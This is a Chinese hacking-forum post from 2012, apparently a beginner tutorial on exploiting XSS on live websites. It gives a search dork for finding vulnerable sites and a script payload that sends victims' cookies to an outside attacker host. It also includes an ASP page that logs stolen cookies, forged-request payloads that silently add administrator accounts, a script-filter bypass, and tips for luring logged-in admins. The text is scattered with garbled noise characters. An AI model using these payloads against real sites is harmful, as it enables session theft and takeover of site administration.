找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2130|回复: 0
打印 上一主题 下一主题

实战xss漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:08:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前天贴吧一位朋友发了个后台XSS利用的帖子,大家就一起讨论了讨论,原帖为:
5 G2 c1 H) C, G* Q
, j7 \: \3 [+ w$ nhttp://tieba.baidu.com/f?kz=1069007239
8 H! U: _/ K8 @) x2 ~7 ^* c( `2 t- @6 @9 [8 g
这个帖子说的只是一个思路,不是很详细,并且说的是利用后台XSS挂马的情况,但是其实在后台挂马一般是不会牵扯到XSS的,只是一个过滤不过滤转换不转换的问题,比如很多带编辑器的后台,都是不过滤不转换在文章中的html代码的,比如eweb,你可以直接编辑发表文章的时候的html代码,这就为挂马、盗cookie提供了很多机会。
" j7 [9 b/ B( e- p5 H' i
7 W/ c  j8 s0 N/ L, E& n2 K" V但是,我想说的是,即使是挂马、盗cookie,也是不会使用location这种手法的,因为这样太明显了,一般都是使用普通挂马的手法的,比如iframe、JS等等。) e1 b* Y9 f$ J8 ]2 `

: G  w4 L* L0 E( }0 I我在上边的帖子中说作者讲的不是很详细,希望出一个详细点的利用教程,于是今天又一位朋友就发了一个详细些的文章,我这里就发大博客里,让更多需要的朋友看到这篇文章。
' U; [9 \4 f2 L6 b# B" Q6 A
! ^" l- R# Q0 e这个文章是对XSS的一个很简单的利用,原理很简单,主要用于科普,只是想让朋友们知道,XSS并不是简单的弹个框框玩那么简单的,是有很多利用价值的,在国外,XSS已经被列为网站杀手之一,包括国内的很多大站,大家都把心思放到了防范SQL注入上,相应的对XSS的防范就很少,这也是XSS总是能成功的原因之一。
4 m% G+ |6 \) Y' T, t. {2 }$ j/ `" U* C1 r
好了,废话不多说了,一起来看文章吧。
, g- [) V) I: {3 C1 c" z+ X
; L$ L) |2 ]# y$ {7 r  a-------------------------------------------------------------------
: H) m) u- i# H! Q: Y- C
6 y/ n/ L" X3 @' \/ u) g首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先<script>alert('xxs')</script>一下。呵呵,框框出来了。- o; t! A' {0 y: A

2 e6 [  Z- p# t% i* R
4 p* z1 t7 m* g6 p8 C( h9 @9 {. X$ A) N- R  E
再看看自己的Cookie吧,把alert里面的内容换成document.cookie就可以了,如图:) M" F0 W0 l* m! c+ g* a

( U1 k5 s- y' [% F   t/ }4 ~7 u# m- @/ j6 E% {
; @5 Q0 J% ^3 W0 k( H
这里就是要把弹出来框框里的东西收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是
) B0 ~: I: F/ T2 D1:让目标访问已跨站的网址,然后这个网址执行脚本, u! G/ @8 S( f$ d* ^8 S
2:然后跳转到你已经写好专门用来收集Cookie的网址
7 f8 Y0 y! z/ I  A! A5 `6 H4 s, Z3 ]+ }  t3 U  k+ w3 M
具体实现方法:" r; a4 W- ]7 }) N
先构造语句<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>. d* M7 I& D. n) R$ s2 E! s
这句话意思是打开一个新的窗口,访问http://dlgyi.rrvv.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。
+ @8 \+ Y4 x1 _% R0 j/ \
. w, H: e( j! M这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:
. E7 w! A; d  N" Y0 Y1 ]; F
- ?4 H- j# g; S7 B<html>4 ]  r4 ^+ p7 r- v8 Z
<title>xx</title>
# [: Z7 ]# [/ N1 U5 P/ l) j8 \<body>
( C! _/ n) D3 E4 V<%: L# ^* ?' i; J4 @1 x/ m6 m
testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中; ~) F" n" s6 d1 \. A" L
msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值
; J6 n  o* |! y( q* ~! mset fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象
6 u3 L/ X+ p8 C$ y3 Z; @6 N' F, F9 g- Dset thisfile = fs.OpenTextFile(testfile,8,True,0)
$ X! i; M. B# |% e: I6 qthisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
' O6 s4 B/ b7 [. b3 bthisfile.close   //关闭
3 H9 X% w5 v' {" Y* z3 Y) jset fs = nothing
% u# E% D% S' ~$ X4 V%>* Z0 b/ x4 V$ ^, |
</body>4 J, d; ]+ h6 R" x
</html>* X8 @& |9 T0 m) H  }8 E, J7 w
, F9 ?- D7 c2 q$ u) }* E3 E
然后保存,放在你自己服务器上,如果有人点击构造好的XXS页面,就会自动在你网站的根目录生成一个文本:
3 `+ Z, B2 @  D# e% E* d4 Y8 A8 V
8 U. R; |! ]3 M6 R0 [
+ D8 \( o: S1 j5 L
  V: p7 ]' l  g3 k
4 c6 {" b7 m& [/ {/ R9 ?; K9 s拿出来看看,呵呵,Cookie到手:
. L1 r  t: d, w, K0 B6 j: }* C' j2 }7 |

5 h  O. u8 w6 S4 y8 W; c# p, H: \! Y4 J2 R
本文只是抛砖引玉,而且没有多大的实战价值,一来很多网站都过滤掉了+号这个字符连接符,二来稍大点的站,也不会存在如此的XXS,本文旨在给新手一个练习的向导,毕竟不可能谁一开始学习就可以RI掉大站,从小站开始练手,一起进步。话说咱也是新手O(∩_∩)O~" U- M2 z' x( a' \
) {  s$ |4 s0 J' B, ^- C
PS:一点小提示,如果提交<script>alert('xxs')</script>网站没有反应时,不要立刻就点X。你可以鼠标右击,查看一下网站的源码,看看网站到底过滤掉了什么字符,通过编码啊神马的发挥下智慧,绕过过滤。只要出现小框框,咱就胜利了。9 H0 x  u& |4 r' v4 x

1 k, U5 Y. H' I' q1 G: I1 K-------------------------------------------------------------------  T3 L6 {( X1 t! d8 i$ z& R
2 x% X2 y/ ^! v9 n; O' f4 s( x
下面是我对这个帖子的回复,也一起贴过来吧:8 y' w0 P- _1 s' ~
5 D8 R8 `& O  A3 M
说实话,像这种后台XSS其实作用不大的,一般的小站你拿到cookie也没什么利用价值,大点的站的话,或许可以用cookie盗点装备什么的,但那牵扯的多了,不过对于普通脚本小子来说,日站的时候除非毫无办法了还会想到XSS的,不过日站时候的XSS利用方法跟这篇文章里讲的差不多的,可以借鉴一下。
: i) B# J; f2 q; ^6 |
8 g4 E4 L" e4 ^( h) C- B但是,这里的文章讲的是针对已经进入后台、拿shell无望又想多获得点东西的情况,说它鸡肋的原因是,你知道的,现在大部分站都是cookie+session的,并且一般用户名和密码不会直接放到cookie里了,这是它鸡肋的原因。
  P9 V2 s, l. U再者,日站的时候盗cookie一般是想进后台,但是如果遇到网上有源码的情况的话,还可以进一步利用,比如添加个管理员什么的。
4 l. P1 ]5 x5 j9 V8 z
6 Q: P1 s1 p4 x8 v- m' b" T在文章的最后,顺便贴上一般XSS的利用思路,也不是原创,原文链接:) h+ F" F' o/ E$ E6 `, J# q
: o& c% L( i- Q/ k
http://user.qzone.qq.com/673116767/blog/1252452536
* z, x7 y% ]/ M( T0 ~2 o4 o" j9 [* h  @% ~/ O7 U- y! ~8 \7 F
一般发现一个xss漏洞后要做的基本上就是这些:
+ q7 p: k& K1 U* a# l
& n$ V' g3 K" F3 V, B1.  伪造请求  使用$_REQUEST或$_GET+ T" z: x6 p7 R" Q1 u
# \& n0 a% d$ ^# L! q7 c
首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:
- ?% y2 ^, w" i( e( {# O<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />( X) c0 \: ?$ x; l) y" V/ ~0 O2 \% x
当管理员登录管理后台后看到包含img的页面的时候,就伪造了一个增加后台管理员的请求,而该请求是由管理员发出的,所以顺利的增加了一个新的管理员。
$ A7 P0 D" B+ U6 {  s5 B7 m7 U" N0 a% `
如果是可视文本编辑器,可以尝试使用输入:
9 Q/ z4 w) I( E0 I. Xhttp://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')- R4 v- ]0 [5 N, U  l
这样最终会构造出:6 R% z* O: l" B& Z9 V" R% S: |
<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />
& p- U* R- ~' P! [' {总之要举一反三。+ G1 b$ M% ~! Q

) ~& Y7 k& |' v3 B6 Q' X2. 伪造请求  使用$_POST' x* ~7 S! O% |! p) Y. D
  {3 }  ~/ l2 t# t, r0 F, N9 Q
当后台接收增加管理员或更改管理密码的变量时使用的是$_POST方式,那么第一种方法无效,我们视情况而定,如果没有过滤<script>,我们可以通过ajax方式来伪造请求,如:7 D/ \; I! y) ^+ ?' n! `. V* l
<sc/*xss*/ript type="text/javascript">* @$ z9 i6 O( ^5 e; N! I
var aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");% @0 _: @% V# \; k9 V5 |, H
aj.open("POST", "/admin/admin_add.asp", false);
/ n/ O3 R. f4 s$ [# fvar postdata = 'name=xxx&psd=yyy';9 J) p; W2 d6 D: R
aj.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
! h' t: J# O6 @( {+ O( vaj.send(postdata);1 O+ M% S" k0 @# u; s) D5 p+ _' ?) z
</scr/*xss*/ipt>% s. G3 ~3 O; F) h$ }4 L2 K% A( m/ v$ q
/*xss*/是HTML注释,用来绕过简单的对script代码块的过滤。/ Y5 P3 P* M! W  b0 A0 l8 d: a

0 `: c, K- [" `1 ~$ B3. 跨站伪造请求 使用$_GET 或 $_REQUEST
- I, V7 m; y% y, K
, ]- q# {7 A- g与第一种伪造请求的方式相似,但是第一种伪造请求是利用站内的xss漏洞进行的,而跨站伪造请求,是站外发起的,比如我在我的博客的首页放了这样一个图片
* i" m; ?0 r6 j$ [* j<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>6 t/ ^$ H& `; |+ e0 J, t4 \& \
然后我跑到dvbbs上发帖子,“勾引”动网论坛的管理员来我的博客,如果动网论坛的管理员已经登录了他的管理后台,然后使用共享进程的浏览器(目前基于ie内核的myie,maxton等等还有firefox都是共享进程的)来访问我的博客,那么他的后台就会被加入一个用户。
8 ^- s5 A2 V0 I2 B3 G, J' s1 A" p3 v4 [
4.跨站伪造请求 使用$_POST(0day)# o- S- ^  `+ w# Q9 `4 r

3 }# x* i% c3 m8 }1 X9 P5 O如果入侵目标的管理后台使用的是$_POST方式来接受变量,那么我们无法在我们的网站跨站使用ajax的post方式提交数据过去,因为ajax是无法跨域的。7 j0 D5 e6 \( o6 j5 b
7 U9 R5 y# P; D" ?* n
但是我们可以在我们的网站放一个form,里面填写好数据,form的action为要利用的有漏洞的页面,然后当有人打开该页面的时候,我们就用js控制该form进行submit,ajax虽然不能跨域,但向域之外的地址提交form总是可以的。; f+ N3 |. ?$ F" B8 @

, ^% }/ r# `* p总之,第3,4种方法成功几率要小一些,因为我们要想办法让已经登录自身后台的管理员,使用共享session的浏览器访问我们的伪造请求的页面,有一点社会工程学的技术含量。
- l' c: C: b5 p  t0 W6 S9 i+ w, J; I3 g+ [# Q& s
OK,该说的都说完了,Over。* U$ X( Z1 t; |8 y" {9 |- z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表